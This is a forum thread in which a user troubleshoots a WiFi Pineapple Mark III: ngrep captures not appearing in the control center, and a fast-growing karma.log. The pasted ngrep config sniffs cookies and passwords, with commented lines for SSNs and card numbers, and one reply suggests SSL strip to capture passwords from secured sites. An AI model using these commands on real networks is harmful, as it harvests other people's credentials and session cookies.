Jump to content

Mk3 Help With Ngrep And Karma

Recommended Posts

please help me for some of the cases that occurred for my MK3:

The first case, ngrep. I've enabled cookies and passwords feature but results from ngrep.log not appear in the pineapple ControlCenter I want to know how to bring it in pineapple control center.

but when I check via ssh to cookie file exists in temporary folder (ngrep.log). is there a solution to display results to the control center ? (attach file)

cookie info


pineapple control center


my ngrep config

# Capture Cookies
ngrep -q -d eth0 -W byline -i 'Cookie:' dst host not >> /tmp/ngrep.log
##ngrep -q -d eth0 -Wbyline -O /tmp/ngrep.pcap -i 'cookie:' tcp and port 80 and dst host not >> /tmp/ngrep.log

# Capture Social Security Numbers
##ngrep -q -d eth0 -W single -w '[0-9]{3}\-[0-9]{2}\-[0-9]{4}' dst host not >> /tmp/ngrep.log

# Capture Credit Card Numbers
# #ngrep -q -d eth0 -W single '[0-9]{4}\-[0-9]{4}\-[0-9]{4}\-[0-9]{4}' dst host not >> /tmp/ngrep.log

# Capture Passwords
ngrep -q -d eth0 -W single -i 'password' dst host not >> /tmp/ngrep.log

second case, karma.log when I turn on my mark III for about 15 minutes and I saw that in the file / tmp karma.log increase in size very quickly. if i can use or activate logrotate karma.log crontab to remove them? (attach file)

using disk partition




please help me :( :( :(


Link to comment
Share on other sites

I actually thought I had a problem with the association log when I first got the MK3 using firefox. I found that if I use chrome I don't have any problems in the interface however I still cant see some of the fields when I use Firefox, not sure why but I would try switching browsers first, its not hard and easy to check.

Link to comment
Share on other sites

Thank you for the reply itsm0ld,

but still no luck, i already tried using chrome still no cookies shown at pineapple control center.



ngrep conf


my pineapple control center


i noticed your trying to capture passwords.. where are you trying to capture from ? if the site is SSL secured, you need to ip/port forward and make sure you have SSL strip running

Edited by allisonmagic
Link to comment
Share on other sites

1. http://wifipineapple.com/doku.php <-- read changelog here

2. yes

3. yes

hi there, thank you for the solution but before i'm flashing to 1.9 i want to ask few things:

1. what's differents beetween 1.0.2 and 1.9 ?

2. is it OK to flash the unit to 1.9 that i bought from hak5 ?

3. if i want to flash it to 1.9 via gui i must start from here right ? sorry for my noobs questions :)


Link to comment
Share on other sites

woww.. Thank you very much diggler for fast response....

for number 1. i meant, why there 2 version available 1.0.2 and 1.9 ?

now i'm confident to flash the router... :) :) :) :) thanks

1.0.2 is the source version. The 1.9 is the compiled firmware which is easy to flash and updated by Sebkinne with fixes and features.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...